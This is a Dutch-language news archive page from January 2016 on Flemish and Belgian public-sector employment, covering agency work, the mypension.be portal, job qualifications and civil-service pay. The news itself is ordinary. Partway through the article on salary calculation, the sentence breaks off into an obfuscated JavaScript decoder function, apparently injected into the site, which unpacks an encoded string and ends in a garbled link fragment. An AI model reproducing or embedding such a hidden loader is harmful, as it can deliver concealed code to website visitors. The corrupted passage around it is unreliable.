Archief januari, 2016

Reacties uitgeschakeld voor Uitzendarbeid voor de overheid

Uitzendarbeid voor de overheid

Door | 29 januari 2016 | Nieuws

Bron: Beslissingen Vlaamse Regering, 29/01/2016

De Vlaamse Regering stemt in met de conceptnota over uitzendarbeid en de daarin opgenomen krijtlijnen om de Vlaamse overheidsdiensten en lokale besturen toe te laten een beroep te doen op uitzendarbeid. Bedoeling is om uitzendarbeid mogelijk te maken voor de Vlaamse overheidsdiensten en lokale besturen, voor onder meer de tijdelijke vervanging van een contractueel personeelslid met deeltijdse loopbaanonderbreking of van wie de arbeidsovereenkomst is geschorst of beëindigd, voor de tijdelijke vervanging van een ambtenaar die zijn ambt niet of slechts deeltijds uitoefent, de tijdelijke vermeerdering van werk, uitzonderlijk werk, tewerkstellingstrajecten of voor artistieke prestaties. Over deze conceptnota wordt het advies ingewonnen van de SERV, de VVSG, de VVP, het Voorzitterscollege en de vakorganisaties.

Reacties uitgeschakeld voor Mypension.be

Mypension.be

Door | 25 januari 2016 | Nieuws

Bron: persmededeling wwwpdos.be, 21 01 2016

 

Vanaf nu kunnen werknemers, zelfstandigen én ambtenaren hun vroegst mogelijke pensioendatum berekenen op mypension.be

Het online pensioendossier mypension.be ontpopt zich verder tot hét online pensioenportaal voor alle gepersonaliseerde informatie over wettelijke en aanvullende pensioenen. De nieuwste aanwinst: werknemers, zelfstandigen en ambtenaren kunnen vanaf vandaag online berekenen wanneer ze met pensioen kunnen.

Sinds mei 2015 is mypension.be beschikbaar voor zowel actieve als gepensioneerde werknemers, zelfstandigen en ambtenaren. Met hun e-ID konden zij al via het online pensioendossier hun post elektronisch lezen, hun pensioenloopbaan (gegevens die meetellen voor hun pensioen) inkijken, hun pensioen aanvragen en, voor de werknemers en zelfstandigen, de uitbetaalde pensioenbedragen raadplegen.

Vanaf nu kan bijna elk Belg boven de 18 - in 2015 waren ze welgeteld met 8.931.886 - op basis van die pensioenloopbaan een raming maken van:

 • -  de vroegste datum waarop hij met pensioen kan in één stelsel (werknemer, ambtenaar of zelfstandige);
 • -  de vroegste gemeenschappelijke ingangsdatum van zijn pensioen, als hij een gemengde loopbaan heeft (een combinatie van werknemer en/of ambtenaar en/of zelfstandige) of de impact op zijn pensioendatum in de andere stelsels als hij toch al met vervroegd pensioen kan in één stelsel.Minister van Pensioenen Daniel Bacquelaine:

  "mypension.be is een gebruiksvriendelijke tool die de burger maximale transparantie garandeert. Vanaf vandaag kan iedereen met enkele eenvoudige muisklikken weten op welk moment hij met pensioen kan gaan en op die manier zijn loopbaan plannen.”

  Tegen 2017 wordt mypension.be hét online pensioenportaal

  De functionaliteiten voor de wettelijke pensioenen op mypension.be worden in de toekomst nog verder uitgebreid:

 • -  Vanaf begin 2017 kan elke burger een raming maken van het bedrag van zijn wettelijke pensioen.
 • -  Eind 2017 zal de burger het effect van bepaalde loopbaankeuzes op zijn pensioen kunnen nagaan vooraleer de stap effectief te zetten.En ook de aanvullende pensioenen worden ontsloten:

- Het luik ‘Mijn aanvullend pensioen’ van mypension.be zal vanaf eind 2016 beschikbaar zijn. Op dat ogenblik zullen verzekeraars en pensioenfondsen de rekeninggegevens van de aangeslotenen meedelen.

Reacties uitgeschakeld voor Ambtenaren doen, de politiek vindt uit…

Ambtenaren doen, de politiek vindt uit…

Door | 8 januari 2016 | Nieuws

Vrijdag 08 01 2016 – 18u

Asielinstantie Fedasil reageerde verbaasd toen er plots een politiek debat over lessen ‘seksualiteit’ voor vluchtelingen de nodige aandacht kreeg.
Verschillende asielcentra (Kapellen, Sint-Niklaas,...) gaven aan al jaren lessen 'seksualiteit' te geven.

Terwijl meerderheid en oppositie applaudisseren voor lessen 'omgaan met vrouwen' voor asielzoekers, krijgt staatssecretaris Theo Francken (N-VA) tegenwind van zijn eigen administratie. 'We geven al jaren die begeleiding en dat werkt perfect', klinkt het bij Fedasil.

Alvast een voorbeeld hoe politiek niet altijd weet waar ambtenaren mee bezig zijn.

Reacties uitgeschakeld voor Beroepskwalificaties administratief medewerker

Beroepskwalificaties administratief medewerker

Door | 8 januari 2016 | Nieuws

Persbericht Vlaamse Regering, 08 01 2016

Op voorstel van viceminister-president Hilde Crevits en minister Philippe Muyters
Het decreet over de Vlaamse kwalificatiestructuur bepaalt dat de Vlaamse Regering op basis van een erkenningsadvies van het Agentschap voor Hoger Onderwijs, Volwassenenonderwijs, Kwalificaties en Studietoelagen (AHOVOKS) beslist over de erkenning van een beroepskwalificatie. Een beroepskwalificatie is een afgerond en ingeschaald geheel van competenties waarmee een beroep kan worden uitgeoefend.

De Vlaamse Regering beslist volgende beroepskwalificaties te erkennen: medewerker spoelkeuken, keukenmedewerker, matroos zeevisserij, roerganger zeevisserij, stuurman zeevisserij, schipper zeevisserij, polyvalent administratief ondersteuner, polyvalent administratief medewerker, administratief medewerker onthaal, productieverantwoordelijke papier- en kartonverwerking, technicus industriële automatisering, meet- en regeltechnicus, operator raam- en woningdecoratie, bestuurder van landbouwmachines.

Reacties uitgeschakeld voor Hoe wordt het loon berekend bij de Vlaamse overheid?

Hoe wordt het loon berekend bij de Vlaamse overheid?

Door | 5 januari 2016 | Nieuws

Bron: Vlaamse Overheid, 05/01/2016

Wie voor de Vlaamse overheid werkt, krijgt een salaris op basis van vastgelegde salarisschalen. Er zijn verschillende factoren die het salaris bepalen:

 • niveau van de functie
 • graad
 • salarisschaal
 • anciënniteit.

De functies worden ingedeeld in vier niveaus (A, B, C of D) op basis van het diploma dat bij de werving vereist is.

Functieniveau Minimaal vereist diploma
A universitair diploma of masterdiploma
B graduaatsdiploma of bachelordiploma
C diploma secundair onderwijs
D geen diploma vereist

Binnen een niveau zijn er groepen gelijkaardige functies: graden. Die worden verloond in eenzelfde salarisschaal.

Maar naast niveau en graad, speelt ook anciënniteit een rol. Er wordt een onderscheid gemaakt tussen geldelijke anciënniteit en schaalanciënniteit.

Uw geldelijke anciënniteit bouwt u automatisch op tijdens uw loopbaan, zowel als contractueel en als statutair ambtenaar. Voor de berekening van de geldelijke anciënniteit kan u misschien zelfs voorgaande ervaring bij een andere werkgever mee in rekening brengen, onder bepaalde voorwaarden.

Schaalanciënniteit wordt enkel opgebouwd door statutaire ambtenaren. Wanneer een statutair ambtenaar een aantal jaren in dezelfde salarisschaal heeft gewerkt, dan groeit hij of zij automatisch door naar een volgende salarisschaal.

Voorgaande ervaring

Personeelsleden die al ervaring hebben wanneer ze aan de slag gaan bij de Vlaamse overheid, kunnen in bepaalde gevallen die function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndande-prestaties">ervaring laten meetellen bij de berekening van het loon(externe website).

Hebt u al ervaring bij een andere overheidsdienst of een werkgever uit de publieke sector?

Dan tellen de dienstjaren mee voor de berekening van uw anciënniteit.

Komt u uit de privé-sector of werkt u als zelfstandige?

Dan kunnen uw gewerkte jaren meetellen als uw nieuwe leidinggevende deze als ‘functierelevant’ beschouwt. U kunt maximum 20 jaar werkervaring in rekening brengen.

Lees meer over de salarisberekening bij de Vlaamse overheid(externe website).

Andere voordelen en vergoedingen

Naast het loon krijgen personeelsleden van de Vlaamse overheid nog andere (financiële) voordelen en vergoedingen(externe website), zoals:

 • vakantiegeld en een eindejaarstoelage
 • maaltijdcheques
 • volledige terugbetaling van woon-werkverkeer
 • fietsvergoeding
 • gratis hospitalisatieverzekering
 • voordelige kinderopvang tijdens schoolvakanties.

Ten slotte hebben de Vlaamse ambtenaren ook nog recht op ander voordelen, zoals een uitgebreid opleidings- en vormingsaanbod, psychosociale en juridische hulp of een gratis griepvaccinatie.

Reacties uitgeschakeld voor Het hoge loon van de ambtenaren ?

Het hoge loon van de ambtenaren ?

Door | 5 januari 2016 | Nieuws

05 01 2016 – Bron: Fedweb
Het loon van ambtenaren wekte de laatste weken veel interesse op. Naar aanleiding van de enquête in Jobat -waaruit bleek dat het loon van een ambtenaar hoger was dan dat van een bediende uit de privé- kwam VTM polsen hoe het nu precies zit met dat loon. Het antwoord is vrij simpel: het loon van ambtenaren is gebonden aan barema’s en deze barema’s zijn op hun beurt verbonden aan diplomaniveaus.

Hoge loon ambtenaren
Zo start een master binnen de federale overheid met een netto maandloon van 1.700 euro. Maar iemand met een lager diploma, zoals penitentiair bewakingsassistent (cipier) kan bijvoorbeeld tot 1.500 euro netto verdienen per maand door ploegendienst en weekendwerk.

VOKA gaf in zijn rapport ook kritiek op de lonen van de ambtenaren. Het loon dat de overheid biedt aan starters zou te hoog zijn zodat er geen eerlijke concurrentie meer bestaat tussen privé en overheid. Het enige wapen van de privé zou nog bestaan in de extralegale voordelen zoals daar zijn de bedrijfwagens, maaltijdcheques, onkostennota's…

Wat vooral te onthouden is, is dat het loon niet de enige reden is waarom iemand ambtenaar wil worden. Het gaat om een weloverwogen keuze en een keuze voor een totaalpakket. Het gevoel hebben iets nuttigs te doen, de mogelijkheid hebben om opleidingen te volgen, om het privé- en professioneel leven op elkaar af te stemmen. Dat zijn redenen die even zwaar doorwegen om te kiezen voor een carrière binnen de openbare sector.

Je vindt alles over het loon van de federale ambtenaren op fedweb.